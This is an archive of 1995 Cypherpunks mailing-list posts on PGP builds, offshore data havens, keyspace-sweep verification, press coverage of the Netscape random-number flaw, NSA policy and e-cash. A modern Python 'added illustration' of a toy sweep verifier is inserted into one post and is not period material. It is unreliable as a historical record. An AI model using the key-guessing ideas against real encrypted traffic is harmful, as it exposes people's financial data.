To: "Bret A. Johnson" <bret@bjohns.win.net>
Subject: Re: PGP for Linux 1.2.8
In-Reply-To: <1818@bjohns.win.net>
Message-ID: <Pine.OSF.3.91j.950918193444.3251B-100000@saul3.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Sep 1995, Bret A. Johnson wrote:

> Can anyone tell me where a version of PGP 2.62 can be found for Linux?
> I got one off of ftp.berkeley.edu (pgp262s.zip) and it (or I can not
> get it) to compile on my system..

It compiled on mine just fine. Be sure you have an up to date
bintools and gcc.

1. Make sure you are using 2.5.2/2.6.3. That's how I compiled mine.
2. Unzip the source in /usr/src/pgp (or wherever)
3. cd /usr/src/pgp/rsaref/install/unix
4. make
5. cd /usr/src/pgp/src
6. make linux

And you should have a pgp binary.

7. cp /usr/src/pgp/src/pgp /usr/local/bin/pgp

Though they might differ, the MD5 hash of my Linux version is 
f7dd657c0c5ed8a5cb7c5dfcf5af6c5b.

Good luck!

+---- Yih-Chun Hu (finger:yihchun@cs.washington.edu) ----------------------+
| http://www.cs.washington.edu/homes/yihchun     yihchun@cs.washington.edu |
| http://weber.u.washington.edu/~yihchun         yihchun@u.washington.edu  |
+---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+
| 1024/E50EC641        B2 A0 DE 9E 36 C0 EB A6  F9 3E D2 DD 2F 27 74 79    |
| 2047/DF0403F9        18 EB 62 C8 7F 06 04 67  42 76 24 E2 99 D1 07 DC    |
+---- Random Thought ------------------------------------------------------+
|I conducted an experiment to test Murphy's Law, but everything went wrong.|
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 18 Sep 95 17:49:58 PDT
To: cypherpunks@toad.com
Subject: Caribbean Internet Services? (fwd)
Message-ID: <199509190100.UAA00247@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> To: cypherpunks@toad.com
> From: tcmay@got.net (Timothy C. May)
> Subject: Caribbean Internet Services?
> 
> A brief note, though the hardship to the Caribbean islands will not be brief.
> St. Thomas, St. Croix, and other islands were hit extremely hard by
> hurricane Marilyn. Previous hurricanes, including Luis, also hit some of
> the islands.
> 
> ObCypherpunks Relevance: A couple of past or current list members have
> nascent Internet plans in some of these islands. (I think one of them is
> way south, just off Venezuela.)
> 
> I suspect "Caribbean Data Havens" and "Internet Sites" are further off than
> they were a few months ago.
> 

Satellite dishes and a steady supply of gasoline via a couple of tankers
would make such an operation completely portable. A more ideal solution
would be to moor a ship in international waters (wasn't some group wanting
to do this for 'humanitarian' reasons or somesuch?).

                                               Jim Choate




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 18 Sep 95 17:51:27 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Caribbean Internet Services?
In-Reply-To: <ac835f9008021004ec69@[205.199.118.202]>
Message-ID: <199509190051.UAA01037@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> Power in St. Thomas may not be back for a year in some parts. The roads,
> sewers, power lines, phone system, etc. will likely have to be completely
> rebuilt.
[...]
> I suspect "Caribbean Data Havens" and "Internet Sites" are further off than
> they were a few months ago.

Not really. I suspect that phone company co-location and using buried
lines and your own generator would probably fix most problems if you
were "serious" about doing such a thing.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Mon, 18 Sep 95 20:50:14 PDT
To: cypherpunks@toad.com
Subject: Musings
Message-ID: <199509190256.UAA00267@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I noticed Sameer's release had some nice shots at ITAR. Heh. When aiming
for outsiders, it might be productive to explain what cpunks do in a I'm-
ok-you're-ok sorta way. For example, "the cryptographic research group 
'cypherpunks'..."

ObHackNetscape:

I was thinking last night about the process of verifying that someone
had swept the keyspace that they claimed to have swept. (Umm, well,
so much for Mozilla, but ya know, next time...) and I wanted to run
this idea past Those Who Know[tm]:

When doling out a segment of 16M keys, attach results of two randomly
chosen garbage decryptions. The bruter has to report back which two keys
they are. The overhead would add up, but I don't think it would be
significant. Or if a stronger method is needed, provide the MD5 hash
of the garbage decryptions. Maybe with a discriminator or something, so
you only MD5 a few thousand.

Anyway, the idea is that if you have to prove that you swept a big
enough chunk to find the two keys, you've proven that you've swept
a great portion of the keyspace. Of course, this does nothing to
prevent _withholding_ a result. But it does prove that most of the 
keyspace has been swept; and most likely the search continued even after 
the two keys are found. 

This would make it much more possible to give consolation prizes without 
worrying about false NAKs of big segments. If anyone is still interested 
in that idea.

ObFactoring:

Picked up the Quadratic Sieve factoring program from Mathworks. Haven't
had a chance to compile it yet, but Bob Silverman told me in email he
was willing to make it available to a group such as [The Cryptographic 
Research Foundation] Cypherpunks.

ObHamilton '95:

Pulled up my tomorrow's stock pages. Netscape takes a big hit, but not
big enough for a foolish thing like that. I hope none of my banks go 
around setting their safe combinations to 1234 or anything...  ;|

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMF4xO8La+QKZS485AQFQtQL/f9bmpnGT/3FfB2rqnFmMltJEkgY8/Oym
Vtkzm6xrlApY7b9b2UhVvPXurHU8DBAZeqj5Yu7VvLsQ+w3YelGEAYfzdhECk2t/
5NRYi0RkgFkIs+XCuDGVkoSXExT++KsZ
=V54e
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *
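
Added illustration, not part of Don's message: the sweep check described under ObHackNetscape, in which the coordinator hands out two tags of "garbage decryptions" with each segment and accepts the segment only if the worker names both keys. The cipher is a toy stand-in, the segment is 4096 keys rather than 16M so it runs instantly, and the known-plaintext marker, the one-byte discriminator and all function names are assumptions.

```python
import hashlib
import secrets

KEY_BYTES = 5                  # 40-bit keys
KNOWN_PREFIX = b"GET "         # constructed known-plaintext marker for a real hit


def trial_decrypt(key: int, ciphertext: bytes) -> bytes:
    """Toy stand-in cipher (assumption): XOR with a SHA-256-derived keystream."""
    stream = hashlib.sha256(key.to_bytes(KEY_BYTES, "big")).digest()
    return bytes(c ^ s for c, s in zip(ciphertext, stream))


def make_challenge(start: int, size: int, ciphertext: bytes):
    """Coordinator: pick two keys in the segment, publish only tags of their output."""
    planted = secrets.SystemRandom().sample(range(start, start + size), 2)
    tags = []
    for key in planted:
        garbage = trial_decrypt(key, ciphertext)
        # (discriminator byte, MD5 of the garbage); MD5 is the hash the post names.
        tags.append((garbage[0], hashlib.md5(garbage).hexdigest()))
    return set(planted), tags  # `planted` stays with the coordinator


def sweep(start: int, count: int, ciphertext: bytes, tags):
    """Worker: try `count` keys from `start`; return (real hits, keys matching a tag)."""
    wanted = {}
    for first_byte, digest in tags:
        wanted.setdefault(first_byte, set()).add(digest)
    hits, proof = [], []
    for key in range(start, start + count):
        plain = trial_decrypt(key, ciphertext)
        if plain.startswith(KNOWN_PREFIX):
            hits.append(key)
        # Cheap discriminator first, so MD5 runs on roughly 1 key in 256.
        digests = wanted.get(plain[0])
        if digests and hashlib.md5(plain).hexdigest() in digests:
            proof.append(key)
    return hits, proof


def verify_sweep(planted: set, proof) -> bool:
    """Coordinator: exact match only, so listing every key in the segment fails."""
    return set(proof) == planted


def demo():
    real_key = 0x1234567                                 # constructed
    message = b"GET /order?card=CONSTRUCTED"             # constructed, under 32 bytes
    ciphertext = trial_decrypt(real_key, message)        # XOR cipher: same operation
    start, size = 0x1234000, 1 << 12
    planted, tags = make_challenge(start, size, ciphertext)

    honest_hits, honest_proof = sweep(start, size, ciphertext, tags)
    # A worker that stops just before the last planted key cannot name it.
    _, lazy_proof = sweep(start, max(planted) - start, ciphertext, tags)
    return {
        "real_key": real_key,
        "honest_hits": honest_hits,
        "honest_ok": verify_sweep(planted, honest_proof),
        "lazy_ok": verify_sweep(planted, lazy_proof),
    }


if __name__ == "__main__":
    print(demo())
```

As the message itself points out, this shows the segment was searched up to the planted keys but cannot detect a worker who finds the real key and withholds it.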




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.COM>
Date: Mon, 18 Sep 95 21:17:59 PDT
To: cypherpunks@toad.com
Subject: Bidzos takes advantage of Netscape hole!
Message-ID: <9509190017.aa08714@ncrhub1.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain


The following article has a quote from Bidzos claiming that they offered to
review the code but that Netscape declined.  Of course the good student is
going to have them review it...  

   How about having Goldberg and Wagner review it for some bucks!!!

     2
-- C  --
----------------------------------------------------------
Netscape's Internet Software Contains
 Flaw That Jeopardizes Security of Data

 By JARED SANDBERG
 Staff Reporter of The Wall Street Journal 

 A serious security flaw has been found in Netscape Communications
 Corp.'s Internet software, jeopardizing sensitive financial data such as
 credit-card numbers that users pass over the global computer network. 

 The company acknowledged the flaw and said it's issuing a software fix. But
 as is often the case with Internet security, it may take time for users to
 adopt the fix, leaving them vulnerable meanwhile. 

 "It's a very big trapdoor," said Dietrich Kappe, a partner with Red Planet
 L.L.C., a Chicago Internet consulting firm. "You can drive a truck through
 it. Somebody goofed" at Netscape, he added. 

 The breach presents a problem for Netscape, which produces the most
 popular software for browsing the World Wide Web, the multimedia portion
 of the Internet where businesses are setting up electronic storefronts to sell
 goods and services. Netscape has captured roughly 75% of the "browser"
 market, reaching roughly eight million people, who use the Netscape
 product to browse the Web and make credit-card purchases. The breach
 also underscores the persistent security problems that have plagued the
 Internet and forestalled electronic commerce. 

 Netscape uses so-called symmetric key cryptography to scramble sensitive
 data so that they are unreadable by hackers snooping on the network. That
 key is essentially a mathematical formula so long that it makes it impractical
 for hackers to crack, even with powerful computers. The formula is
 generated by a random number that may be determined by the number of
 electronic-mail messages, for example. Netscape's software chooses a
 number between one and two-to-the-30th-power -- or roughly one billion. 

 But on Sunday night, two graduate students at the University of California at
 Berkeley posted a message to the Internet's "Cypherpunks" mailing list, a
 group of mathematicians and programmers who discuss the science of
 cryptography. In the electronic missive, they said that the random number
 that generates the mathematical key was "fairly trivial to guess" and that the
 key "usually takes less than one minute to find." 

 Rather than try to break the encryption "key," the two graduate students
 examined the so-called "random number generator" and discovered that the
 number isn't so random, allowing them to guess the encryption key. It took
 the two students, Ian Goldberg and David Wagner, two days to identify the
 vulnerability and write a software program that could guess the encryption
 key in less than one minute. 

 Netscape's software, said Mr. Goldberg, 22 years old, "is not as good as
 people thought, which is probably worse than no security" since people have
 a false sense of security as they enter payment details. 

 "The information we were using to create the key is now a known set of
 information," said Jeffrey Treuhaft, security product manager for Netscape.
 "We feel it's important to let our consumers know," he said, adding that the
 company will post a warning on its own Web site. 

 "It's a serious hole, but it can easily be corrected," said James Bidzos,
 president of RSA Data Security Inc., which licenses security technology that
 Netscape incorporates in its system. Netscape said it plans to have a
 software fix to resolve the problem available for downloading over the
 Internet by the end of this week. 

 RSA's Mr. Bidzos said his company offered to review Netscape's security
 when it first introduced its browser, but Netscape declined. "They're asking
 us to review it this time," he said. 

 A month ago, a student at France's Ecole Polytechnique cracked the same
 weaker encryption system that U.S. government policy forces Netscape to
 use in a foreign version of its Navigator software. To break the code, the
 student used 120 computer workstations and two supercomputers working
 for eight days to break the so-called 40-bit encryption system, a number
 that refers to length of the encoding "key," which is used to scramble data. 

 Netscape sells a far stronger version of its software that includes 128-bit
 key length, but is prevented by the government from distributing it on the
 Internet. The government fears that such strong encryption could fall into the
 hands of terrorists who might use it to communicate without fear of being
 tapped by U.S. security agencies. Security experts, however, noted that the
 same problem exists with the stronger software. 

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
PGP-encrypted e-mail welcome!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 18 Sep 95 18:11:11 PDT
To: technomads@UCSD.EDU
Subject: Vince Cate is Breathing ;-)
Message-ID: <v02120d02ac83c1c56ba2@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I think I can be forgiven for sharing a little private mail interchange I
just had with Vince Cate, the Anguillan ex-cypherpunk/technomad, who's
digging out from under Hurricane Luis...

Cheers,
Bob Hettinga

--- begin forwarded text

Date: Mon, 18 Sep 1995 13:47:36 +24000
From: Vincent Cate <vince@offshore.com.ai>
Subject: Re: How are you doing?
To: Robert Hettinga <rah@shipwright.com>
MIME-Version: 1.0



> I figure by now the phone lines might be up, though I had heard there was
> only one line up on Anguilla the day after.
>
> Can we do anything here to help?

I am not sure if my other mail made it.

Ya, the roof blew off of the phone company and also the electric company.
All the phone company could do was set up an inmarsat phone line and
charge $60/min to make calls.

Thanks.  I can't think of anything I need.  Unless you know who sells
directional cell phone antennas.

Thanks!

   --  Vince
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 18 Sep 95 18:10:08 PDT
To: cypherpunks@toad.com
Subject: NYT on Netscape SSL Crack
Message-ID: <199509190110.VAA20649@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


WQXR, the New York Times radio station, just reported on the 
crack, citing Markoff's article tomorrow. Says Netscape plans a 
fix, perhaps as early as tomorrow.


We'll get a late-night copy and post it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Mon, 18 Sep 95 19:16:52 PDT
To: cypherpunks@toad.com
Subject: John Young You are KEWL!
Message-ID: <199509190216.TAA05926@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


It is really nice what you're doing here.
It is appreciated.

Love Always,

Carol Anne
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 18 Sep 95 21:23:36 PDT
To: cypherpunks@toad.com
Subject: NSA and Netscape Crack (Re: NYT on Netscape Crack)
Message-ID: <ac8391c012021004b6fc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:00 AM 9/19/95, John Young wrote:
>   The New York Times, September 19, 1995, pp. A1, D21.
>
>
>   Security Flaw Is Discovered In Software Used in Shopping
>
>   By John Markoff

>   The discovery is the second reported security weakness in
>   the Netscape program to be posted on the Cypherpunks list
>   in the last month. In August, Damien Doligez, a student at

Seriously, where's the NSA when you really need 'em?

If the "flaws" are being found by our group, as John notes, just what is
the NSA doing in the _second_ role it is supposed to have, its "COMSEC,"
or communications security, role?

(Note: As outlined by Bamford, and others, the Agency has a dual role:
penetrating communications it is chartered to penetrate, and helping to
secure communications it is chartered to help secure. Traditionally, the
penetrating side is called SIGINT or COMINT, and the securing side is
called COMSEC. The names may have changed by now.)

Personally, I don't actually _want_ them vetting the work of others, but I
think this whole series of events with Netscape makes it abundantly clear
that the supposed "dual role" of the NSA in both breaking ciphers and in
ensuring higher security is a farce.

If the NSA had not found the flaws our two Berkeley grad students found,
we've grossly overestimated them as a threat. And if they found the flaws
but said nothing, what does this say about their claimed COMSEC benefits to
American interests? (Granted, not all of us are Americans, but I think you
understand my point about the NSA claiming it has a role, then doing
nothing concrete, and even being misleading in its plans and programs.)

If the NSA _really_ wants to really help secure communications against
fraud, eavesdroppers, and foreign intelligence agencies, it can do so by
immediately relaxing the restrictions on crypto export. While this may not
stop things like weak random number generators, it moves us to an era of
"strong" crypto and away from the "toy" crypto the NSA seems to want us to
have.

I think, however, it's clear by now that they have little interest in
helping to secure communications and that weak "toy" systems are their
preference.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Mon, 18 Sep 95 20:57:24 PDT
To: adam@lighthouse.homeport.org (Adam Shostack)
Subject: Re: Good random seeds
In-Reply-To: <199509182042.QAA02146@homeport.org>
Message-ID: <199509190357.VAA22661@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain




Adam Shostack writes:

> 	Since we can all see how badly time works, I'd like to point out
> that Will Price, author of the excellent Cryptdisk utility for the Mac,
> uses mouse movements to seed his PRNG.
> 
> 	His code is available for a small fee, and I'd strongly suggest
> that people who need good, easy PRNs take a look at it, and also take a

Just to clear up a point of attribution, the core random number generator
used by CryptDisk was designed and written by Colin Plumb, with a wrapper
for the Macintosh written by me. Will (Price) told me that he has made
some improvements to my original implementation for the latest version
of CryptDisk, doing the clock timings more simply.

My code and Colin's are free, and I'd be happy to post the routines if there 
is interest.

                                   -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 18 Sep 95 22:02:45 PDT
To: perry@piermont.com
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190355.XAA01329@frankenstein.piermont.com>
Message-ID: <199509190457.VAA20451@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Not, of course, that they disclosed it before -- it was found by
> reverse engineering the distributed executable. Not, of course, that
> they have a choice in the matter of whether to disclose it -- they
> will be "disclosing" how it's done as soon as they release the
> code. Not, of course, that security through obscurity does any good --
> it just magnifies the pain.

	Once netscape is patched with a stronger PRNG if someone can
crack -that- one too, then they will get a T-shirt as well. Perhaps I
should offer the t-shirt for just revealing the algorithm used w/o
actually cracking it, just to deal with that statement from "Netscape
officials".
	I emphasized in my conversation with the SFChronicle today
that 'security by obscurity' doesn't work. Hopefully that will be
reflected in the article.

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@iglou.com (Steven Weller)
Date: Mon, 18 Sep 95 22:07:06 PDT
To: Sal@panix.com (Sal Denaro)
Subject: Re: AOL monitoring
Message-ID: <v01530515ac840d90f0d8@[199.171.88.78]>
MIME-Version: 1.0
Content-Type: text/plain


>Ohhh-God, not again...
>
>Can anyone remember the Prodigy rumor? How IBM was snooping around
>your hard disk, and it turned out to be nothing but a swapfile. Does
>"Good times" ring a bell? And don't get me started on MicroSoft
>Network rumors...
>
>1) 90% of the FTP sites I use mention that they log xfers.
>
>2) My .newsrc file can tell anyone that I read alt.hackers and alt.2600
>
>3) My address book shows who I send mail often enough to warrant me
>   putting in a nickname.
>
>4) My sent-mail folder shows who I sent mail to in the past year.
>
>5) My bookmark file shows that I read the NYC-Speedtraps page one or
>   two times a week.

Zterm and Anarchie both default to logging transfers. AOL on the Mac has a
button on the download manager that lets you view a list of items you have
downloaded.

It's everywhere.


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@iglou.com                  |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bret@bjohns.win.net (Bret A. Johnson)
Date: Mon, 18 Sep 95 19:15:20 PDT
To: cypherpunks@toad.com
Subject: PGP for Linux 1.2.8
Message-ID: <1818@bjohns.win.net>
MIME-Version: 1.0
Content-Type: text/plain


Can anyone tell me where a version of PGP 2.62 can be found for Linux?
I got one off of ftp.berkeley.edu (pgp262s.zip) and it (or I can not
get it) to compile on my system..


Thanks...

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Mon, 18 Sep 95 19:10:21 PDT
To: sameer <sameer@c2.org>
Subject: Re: Hack Netscape!
In-Reply-To: <199509190106.SAA02447@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.950918220842.9126A-100000@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Sep 1995, sameer wrote:

> 	The T-shirt isn't designed yet but I think the web page can
> take public consumption now. Check out http://www.c2.org/hacknetscape

Heh, what about a shirt for the people who worked through keyspace for 
the second crack? ;)

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 18 Sep 95 22:11:56 PDT
To: cypherpunks@toad.com
Subject: Re: taxonomies of 'real money' and e-cash
Message-ID: <ac839dbd1502100487f5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:33 PM 9/18/95, P.J. Ponder wrote:

...
> Maybe I'm missing the larger point, but isn't it accurate that in the
>digital world, one protocol or procedure may take the place of perhaps
>several of the 'real-world' procedures or protocols?  An effective
>mechanism of signing with non-repudiation that was recognized as binding
>on the signer would permit 'checks', 'promissory notes', 'IOUs', and

I wasn't saying they are all on the same footing, or are all separate and
compartmentalizable things. Clearly some of them are just slightly
different "flavors" of other things. I listed a bunch of them not as a
taxonomy or ontology, but as an illustration that there are many kinds of
financial dealings, many kinds of roles played.

That the real world has so many flavors of financial things could of course
be due to inertia and ignorance, partly. But there are also different
functionalities, and costs. Fitting the different needs, the different
roles of the players. I won't go on and on, as my last post on this I think
hit the main points, but consider how many flavors we have just of
"checks": the "ordinary" checks we write, counter checks, dual-endorser
checks, traveller's checks, and so on. (If you are arguing that only
"digital cash" is a real issue, and all other constructs are "small matters
of programming," then we disagree profoundly.)


>'warrants'.  Some of the other species listed in your post aren't really
>money, anyway.  They are things you can buy with money, like stock
>certificates or Maseratis.  One could conceivably buy convertible
>debentures with e-cash, the same as one could buy them with 'real money',
>but it doesn't follow that there should be some one-to-one mapping of real
>money objects and classes onto electronic analogues.  Once again, i've
>probably missed the forest, but a couple of the trees distracted me.

I don't get your point at all. I didn't claim they were all "money,"
whatever we may mean by _that_ loaded term, but that they are "things" with
important features. And even your example of a thing like a "stock
certificate" is not quite as simple as a thing like a "Maserati."

My belief is counter to yours: I believe many or even most of the financial
things and instruments we deal with today will be mapped into "digital
economy" versions, albeit with new wrinkles and perhaps new names.

(I could cite many examples of protocols that cannot be automated for use
by agents if the only carry-over is "digital cash." Voting of shares,
endorsements on instruments, various kinds of guarantees, reputations, and
so on.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 18 Sep 95 19:25:07 PDT
To: bret@bjohns.win.net (Bret A. Johnson)
Subject: Re: PGP for Linux 1.2.8
In-Reply-To: <1818@bjohns.win.net>
Message-ID: <199509190224.WAA03110@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hi.  PGP 2.6.2 compiles out-of-the-box on Linux.  In fact, Linux is my
personal development platform at home, so I make sure that it works.
Just "make" in rsaref/install/unix, and then "make linux" in src.

If you are in the US or Canada, you can get PGP 2.6.2 from MIT.  Here
are the instructions:

The file ftp://net-dist.mit.edu/pub/PGP/README contains instructions
on how to download PGP 2.6.2.  Included therein are Binaries for DOS
and Mac, and the sources for DOS, Unix and Mac.  To read these files
you should log in with username anonymous and use your email address
as the password.

Alternatively, you can use the WWW interface to get to these packages.
Just connect to the PGP-form web page and follow the instructions:
	http://bs.mit.edu:8001/pgp-form.html

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick.Sciorra@hudson.lm.com
Date: Mon, 18 Sep 95 23:17:18 PDT
Subject: Automatic E-Mail
Message-ID: <43khtu$bis@news1.warwick.net>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of an E-Mail package that will automatically connect
to the Internet and retrieve mail at specific intervals?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 18 Sep 95 20:15:33 PDT
To: cypherpunks@toad.com
Subject: Hurricane Luis in Anguilla / Cellphone Antenna
Message-ID: <v02120d00ac83e18d8f6f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Mon, 18 Sep 1995 13:24:33 +24000
From: Vincent Cate <vince@offshore.com.ai>
Subject: Hurricane Luis in Anguilla / Cellphone Antenna
To: Steve Roberts <wordy@qualcomm.com>
cc: Technomads <technomads@UCSD.EDU>
MIME-Version: 1.0



Hurricane Luis took Anguilla apart.  The three utility poles right near my
house all blew down.  My house, computers, etc are all fine.

Nobody was killed in Anguilla, but in St Marten (5 miles away) it seems
there were many people killed.  They have a lot of poor people there
and also a lot of people used to live in boats.  More than 1,000 of
about  1,400 boats sank.

The eye went right over Anguilla.  For awhile it was calm enough that
everyone went outside to stretch and say hi to everyone.  Overall it
took about 4 days to pass.

It has been nice to have solar panels, batteries, an inverter, etc. I did
not have a cellphone, but I do now.

And now that I have one I am really interested in the directional antenna
that might let me reach other islands - in particular the US Virgin
islands where long distance rates are $0.10/min at night with sprint
instead of the $2/min that we pay here in Anguilla.  Does anyone know
where I can order a directional cellphone antenna (boat antenna) good for
100 miles?

  --  Vince
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 18 Sep 95 20:35:19 PDT
To: cypherpunks@toad.com
Subject: NYT on Netscape Crack
Message-ID: <199509190300.XAA05027@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, September 19, 1995, pp. A1, D21.


   Security Flaw Is Discovered In Software Used in Shopping

   By John Markoff


   San Francisco, Sept. 18 -- A serious security flaw has been
   discovered in Netscape, the most popular software used for
   computer transactions over the Internet's World Wide Web,
   threatening to cast a chill over the emerging market for
   electronic commerce.

   The flaw, which could enable a knowledgeable criminal to
   use a computer to break Netscape's security coding system
   in less than a minute, means that no one using the software
   can be certain of protecting credit card information, bank
   account numbers or other types of information that Netscape
   is supposed to keep private during on-line transactions.

   The weakness was identified by two first-year graduate
   students in computer science at the University of
   California at Berkeley, who published their findings on an
   Internet mailing list Sunday evening.

   Although the Netscape Communications Corporation, which
   produces the software, said today that the flaw could be
   fixed and that new copies of the software would be
   distributed as early as next week, Internet experts said
   the discovery underscored the danger of assuming that any
   computer security system was safe.

   "There needs to be much more public auditability in the way
   these financial security systems are designed and
   implemented," said Eric Hughes, president of Open Financial
   Networks, a company in Berkeley that is developing Internet
   commerce systems.

   The Netscape software is already used by an estimated eight
   million people for navigating the World Wide Web portion of
   the Internet. On the Web, thousands of companies offer
   text, images, video and audio information, much of it as a
   way of advertising or directly selling goods and services.
   Because the Netscape software is not only easy to use but
   has also been promoted as a secure way of dealing with
   personal and financial information, it has been seen as the
   emerging de facto standard for on-line commerce.

   Already, a diverse group of companies -- including Wells
   Fargo Bank, MCI Communications, Internet Shopping Network
   and Virtual Vineyards -- have adopted Netscape as the
   vehicle for checking bank balances, catalogue shopping or
   buying wine on line.

   Although Internet experts agreed with the company's
   assessment that the flaw could be fixed and that it posed
   no risk to people who use the World Wide Web only to
   retrieve nonsensitive data, the security problem's
   disclosure may represent a public relations setback for
   Netscape Communications and an inconvenience to millions of
   people who may feel a need to replace the version of
   Netscape installed on their computers. Last month the
   company's shares began public trading and had one of the
   most successful first days in Wall Street's history,
   largely on the resounding popularity of the Netscape
   software.

   Today, as word of the security flaw circulated only within
   fairly small circles of Internet users, Netscape's stock
   closed with a slight loss, down 75 cents, to $52.50, in low
   Nasdaq trading volume.

   The company said it would release a repaired version of the
   software within a week. Users will be able to download it
   free over the Internet, through the Netscape site on the
   World Wide Web (http://home.netscape.com).

   The company had previously announced a next-generation
   version of Netscape that it said would be more secure than
